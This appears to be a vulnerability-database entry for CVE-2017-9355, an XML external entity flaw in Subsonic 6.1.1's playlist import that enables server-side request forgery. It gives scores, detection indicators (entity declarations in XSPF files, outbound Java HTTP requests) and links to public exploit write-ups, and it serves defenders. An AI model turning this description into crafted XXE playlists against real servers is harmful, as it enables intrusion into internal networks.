CVE-2017-9355
published 2017-06-07CVE-2017-9355: XML external entity (XXE) vulnerability in the import playlist feature in Subsonic 6.1.1 might allow remote attackers to conduct server-side request forgery…
PriorityP260high7.4CVSS 3.0
AVNACLPRNUIRSCCNIHAN
EXPLOIT
EPSS
26.91%
97.8th percentile
XML external entity (XXE) vulnerability in the import playlist feature in Subsonic 6.1.1 might allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted XSPF playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| subsonic | subsonic | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests to Subsonic's import playlist endpoint for uploads of .xspf files containing DOCTYPE declarations or ENTITY definitions, which are indicative of XXE payloads. ↗
- →Detect outbound HTTP connections from the Subsonic server process carrying the Java HTTP client User-Agent header, which is the callback mechanism used in XXE/SSRF exploitation of this vulnerability. ↗
- →Alert on inbound XSPF playlist files containing XML external entity declarations (%mmmm; or similar parameter entity references) during playlist import operations. ↗
- →The XXE attack results in server-side HTTP GET requests originating from the Subsonic host to attacker-controlled or internal network targets; monitor for unexpected outbound GET requests with Java HTTP client headers from the media server. ↗
- ·Exploitation requires user interaction — a user must be socially engineered into importing the malicious .xspf playlist file through the Subsonic UI. ↗
- ·The XXE/SSRF attack vector can be used to pivot to internal network hosts behind a firewall, not just external internet targets, expanding the blast radius beyond the Subsonic server itself. ↗
CVSS provenance
nvdv3.07.4HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txthttp://packetstormsecurity.com/files/142795/Subsonic-6.1.1-XML-External-Entity-Attack.htmlhttps://www.exploit-db.com/exploits/42119/http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txthttp://packetstormsecurity.com/files/142795/Subsonic-6.1.1-XML-External-Entity-Attack.htmlhttps://www.exploit-db.com/exploits/42119/
2017-06-07
Published